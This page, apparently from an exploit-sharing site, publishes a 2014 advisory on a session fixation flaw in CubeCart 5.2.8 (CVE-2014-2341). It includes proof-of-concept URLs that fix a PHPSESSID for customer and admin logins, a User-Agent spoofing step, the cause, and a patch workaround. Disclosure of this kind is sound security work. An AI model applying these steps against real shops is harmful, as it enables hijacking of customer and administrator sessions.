0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CubeCart 5.2.8 - Session Fixation
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: CubeCart 5.2.8 Session Fixation # Exploit Author: James Sibley (absane) # Blog: http://www.pentester.co # Download link: http://www.cubecart.com/download/5.2.8/zip # Discovery date: March 14th, 2014 # Vendor notified: March 15th, 2014 # Vendor fixed: April 10th, 2014 # Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/ # CVE assignment: CVE-2014-2341 CubeCart 5.2.8 is vulnerable to a session fixation vulnerability. The only protection offered is via the User-Agent header field, which can spoofed to match the victim. ======================= =Proof of Concept.....= ======================= *Set the User-Agent for both attacker and victim: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) *To attack a customer: Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337 *To attack an administrator: Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337 When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session. ======================= =Cause................= ======================= The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id. The code handling login procedures do not generate new sessions upon successful authentication. ======================= =Mitigation...........= ======================= Upgrade to CubeCart >= 5.2.9 If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability: In admin.class.php add this at line 324: $GLOBALS['session']->restart(); In user.class.php add this at line 227: $GLOBALS['session']->restart(); # 0day.today [2024-07-02] #